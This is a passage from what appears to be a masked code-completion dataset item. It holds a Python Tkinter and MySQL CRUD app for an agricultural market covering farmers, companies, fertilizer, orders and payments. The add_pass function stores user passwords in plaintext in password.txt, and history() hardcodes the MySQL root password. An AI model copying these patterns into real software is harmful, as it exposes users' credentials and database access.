font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_ord)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Order_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_ord()\n\n\ndef update_command_ord():\n sql = (\n 'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n\n\ndef search_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_or)\n Button.place(x=400, y=400)\n\n\ndef search_or():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['order Id: ', 'Order date: ', 'Order fid: ',\n 'Order formula: ', 'order to: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid order id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_ord()\n\n\ndef payment():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Payment Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_pay)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_pay)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_pay)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pay)\n Button.place(x=410, y=50)\n view_pay()\n\n\ndef view_pay():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM payment;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_pay():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Transaction farmer id', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Transaction date', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Transaction amount', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Transaction method', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e3.insert(0, datetime.now())\n e4.place(x=350, y=160)\n e5 = StringVar(root)\n e5.set('Debit card')\n w = OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')\n w.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_pay_command)\n Button.place(x=400, y=400)\n\n\ndef insert_pay_command():\n try:\n sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n payment()\n except:\n insert_pay()\n\n\ndef delete_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_pay_command)\n Button.place(x=400, y=400)\n\n\n<mask token>\n\n\ndef search_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pa)\n Button.place(x=400, y=400)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef First_page(root):\n global T1, T2, T3\n frame = Frame(root, height=500, width=800, bg='ivory')\n frame.pack()\n label = Label(root, text='WELCOME TO AGRI MARKET', font=(\n 'Times new roman', 25))\n label.place(x=200, y=50)\n button = Button(root, text='LogIn', font=('times new roman', 20),\n command=check_pass, bg='green')\n button.place(x=350, y=350)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=280, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=280, y=250)\n reg_button = Button(root, text='Register', font=('Arial Bold', 15), bg=\n 'blue', command=create_pass)\n reg_button.place(x=340, y=400)\n\n\n<mask token>\n\n\ndef create_pass():\n global root, T1, T2, T3\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=380, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=380, y=250)\n L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),\n bg='ivory')\n L2.place(x=150, y=300)\n T3 = tk.Entry(root, width=30, show='*', bd=5)\n T3.place(x=380, y=300)\n reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=\n 'blue', command=add_pass)\n reg_button.place(x=440, y=400)\n\n\ndef add_pass():\n global root, T1, T2, T3\n if T2.get() != T3.get():\n label = Label(root, text='Incorrect Password. Enter again', font=(\n 'times new roman', 20))\n label.place(x=100, y=100)\n else:\n try:\n with open('password.txt', 'r') as f:\n data = f.read()\n with open('password.txt', 'w') as f:\n f.write(data + '\\n')\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n except:\n with open('password.txt', 'w') as f:\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n\n\ndef entity_page():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n label = Label(root, text='WELCOME TO AGRI MARKET ', font=(\n 'Times new roman', 20), bg='blue')\n label.place(x=200, y=20)\n label = Label(root, text='Choose the Entity ', font=('Times new roman',\n 20), bg='white')\n label.place(x=250, y=100)\n Button = tk.Button(root, text='Farmers', font=('Arial', 15), command=farmer\n )\n Button.place(x=100, y=150 + 25)\n Button = tk.Button(root, text='Company', font=('Arial', 15), command=\n company)\n Button.place(x=300, y=150 + 25)\n Button = tk.Button(root, text='Fertilizer', font=('Arial', 15), command\n =fertilizer)\n Button.place(x=500, y=150 + 25)\n Button = tk.Button(root, text='Order', font=('Arial', 15), command=orders)\n Button.place(x=200, y=300 + 25)\n Button = tk.Button(root, text='Payment', font=('Arial', 15), command=\n payment)\n Button.place(x=400, y=300 + 25)\n Button = tk.Button(root, text='GET BOOKING HISTORY', font=('Arial', 15),\n command=history)\n Button.place(x=200, y=400 + 25)\n\n\ndef history():\n global root, cur, db\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])\n data = cur.fetchall()\n label = Label(root, text='The Transaction History of this month', font=\n ('Arial', 15))\n label.place(x=200, y=20)\n button = Button(root, text='BACK', command=entity_page)\n button.place(x=20, y=20)\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n db.close()\n db = mysql.connector.connect(host='localhost', user='root', passwd=\n 'bhushi', database='farmer_app')\n cur = db.cursor()\n\n\n<mask token>\n\n\ndef view_farmer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('f_id', 'f_name', 'f_phone',\n 'f_mail', 'f_locality', 'f_address'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('f_id', text='Farmer Id')\n table.heading('f_name', text='Farmer Name')\n table.heading('f_phone', text='Farmer Phone')\n table.heading('f_mail', text='Farmer Mail')\n table.heading('f_locality', text='Farmer Locality')\n table.heading('f_address', text='Farmer Address')\n table['show'] = 'headings'\n table.column('f_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM farmer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_farmer():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer_id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Farmer_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Farmer_phone', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Farmer_mail', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Farmer_locality', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n label = Label(root, text='Farmer_address', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=270)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e6 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n e6.place(x=350, y=270)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_farmer_command)\n Button.place(x=400, y=400)\n\n\n<mask token>\n\n\ndef invalid(page):\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n if page == 'farmer':\n label = Label(root, text='Enter valid farmer_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_farmer)\n button.place(x=300, y=400)\n elif page == 'company':\n label = Label(root, text='Enter valid company_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_company)\n button.place(x=300, y=400)\n\n\n<mask token>\n\n\ndef delete_farmer_command():\n try:\n sql = 'DELETE FROM farmer WHERE f_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n farmer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update)\n Button.place(x=300, y=400)\n\n\n<mask token>\n\n\ndef update_command():\n try:\n sql = (\n 'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n farmer()\n except:\n update_farmer()\n\n\ndef search_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=search)\n Button.place(x=400, y=400)\n\n\ndef search():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM farmer WHERE f_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',\n 'farmer mail: ', 'farmer locality: ', 'farmer address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_farmer()\n\n\ndef company():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_company)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_company)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_company)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_company)\n Button.place(x=410, y=50)\n view_company()\n\n\ndef view_company():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),\n xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('c_id', text='Company Id')\n table.heading('c_name', text='Company Name')\n table.heading('c_address', text='Company Address')\n table['show'] = 'headings'\n table.column('c_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM company;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\ndef insert_company():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company_id', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_company_command)\n Button.place(x=400, y=400)\n\n\ndef insert_company_command():\n try:\n if len(e1.get()) > 3:\n invalid('company')\n else:\n sql = 'INSERT INTO company values(%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get()\n cur.executemany(sql, [vals])\n db.commit()\n company()\n except:\n insert_company()\n\n\ndef delete_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_company_command)\n Button.place(x=400, y=400)\n\n\ndef delete_company_command():\n try:\n sql = 'DELETE FROM company WHERE c_id=%s;'\n cur.execute(sql, [int(e1.get())])\n db.commit()\n company()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef update_c():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Company_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_c)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_company()\n\n\n<mask token>\n\n\ndef search_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_c)\n Button.place(x=400, y=400)\n\n\ndef search_c():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=company\n )\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['company id: ', 'company name: ', 'company address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Company Id', font=('times new roman', 15)\n )\n l.place(x=100, y=300)\n search_company()\n\n\ndef fertilizer():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer Table', font=('Times new roman', \n 15), bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_fer)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_fer)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_fer)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_fer)\n Button.place(x=410, y=50)\n view_fer()\n\n\ndef view_fer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('fe_formula', 'fe_name',\n 'fe_content', 'fe_price', 'company_id'), xscrollcommand=x_scroll.\n set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('fe_formula', text='Fertilizer Formula')\n table.heading('fe_name', text='Fertilizer name')\n table.heading('fe_content', text='Fertilizer content')\n table.heading('fe_price', text='Fertilizer price')\n table.heading('company_id', text='Company_id')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM fertilizer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_fer_command():\n try:\n sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n fertilizer()\n except:\n insert_fer()\n\n\ndef delete_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_fer_command)\n Button.place(x=400, y=400)\n\n\ndef delete_fer_command():\n try:\n sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n fertilizer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)\n Button.place(x=300, y=400)\n\n\ndef update_fe():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Fertlizer formula', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Fertlizer name', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Fertlizer content', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Fertlizer price', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='comapny_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_fe)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_fer()\n\n\n<mask token>\n\n\ndef search_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_fe)\n Button.place(x=400, y=400)\n\n\ndef search_fe():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['fertilizer formula: ', 'fertilizer name: ',\n 'fertilizer content: ', 'fertilizer price: ', 'company_id: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Fertilizer formula', font=(\n 'times new roman', 15))\n l.place(x=100, y=300)\n search_fer()\n\n\ndef orders():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Orders Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_ord)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_ord)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_ord)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_ord)\n Button.place(x=410, y=50)\n view_ord()\n\n\ndef view_ord():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = 